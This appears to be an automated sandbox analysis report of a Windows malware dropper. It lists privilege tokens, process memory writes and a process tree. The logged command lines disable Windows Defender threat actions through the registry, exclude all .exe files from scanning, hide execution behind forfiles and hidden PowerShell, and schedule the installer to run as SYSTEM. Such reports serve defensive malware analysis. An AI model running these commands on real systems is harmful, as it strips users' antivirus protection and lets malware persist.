Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe
PID 4520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe
PID 4520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe
PID 800 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe
PID 800 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe
PID 800 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe
PID 3152 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4424 wrote to memory of 4428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4424 wrote to memory of 4428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4424 wrote to memory of 4428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4428 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4428 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4428 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4640 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4596 wrote to memory of 684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 684 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 684 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 684 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4640 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1260 wrote to memory of 4900 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 4900 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 4900 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4900 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4900 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4900 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4640 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2244 wrote to memory of 3892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 3892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 3892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3892 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3892 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3892 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4640 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4640 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3904 wrote to memory of 4656 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3904 wrote to memory of 4656 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3904 wrote to memory of 4656 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4656 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2736 wrote to memory of 4868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 2736 wrote to memory of 4868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 2736 wrote to memory of 4868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 3152 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3152 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3152 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3364 wrote to memory of 2960 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3364 wrote to memory of 2960 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3364 wrote to memory of 2960 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe

"C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe"

C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe

.\Install.exe /zUdidqb "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bGTnZQDECKwDuNSWyq" /SC once /ST 23:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe\" FN /pHrdidyrpE 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bGTnZQDECKwDuNSWyq"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bGTnZQDECKwDuNSWyq

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bGTnZQDECKwDuNSWyq

C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe FN /pHrdidyrpE 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

